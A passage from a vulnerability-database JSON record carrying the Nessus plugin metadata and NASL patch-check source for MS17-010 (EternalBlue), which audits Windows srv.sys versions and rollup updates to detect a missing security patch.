["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-02-21T01:29:44", "value": 7.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-02-21T01:29:44", "differentElements": ["cvelist", "cvss", "cvss3", "description", "href", "modified", "reporter", "sourceData"], "edition": 3}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "f5a827d66102365afa1f484cc669d6442b467535d28f86ec3af0bbbcc34f5c23", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2020-06-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-06-01T04:18:42", "history": [], "viewCount": 2786, "enchantments": {"dependencies": {"modified": "2020-06-01T04:18:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46"], "type": "saint"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27607", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-01T04:18:42", "rev": 2, "value": 7.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, 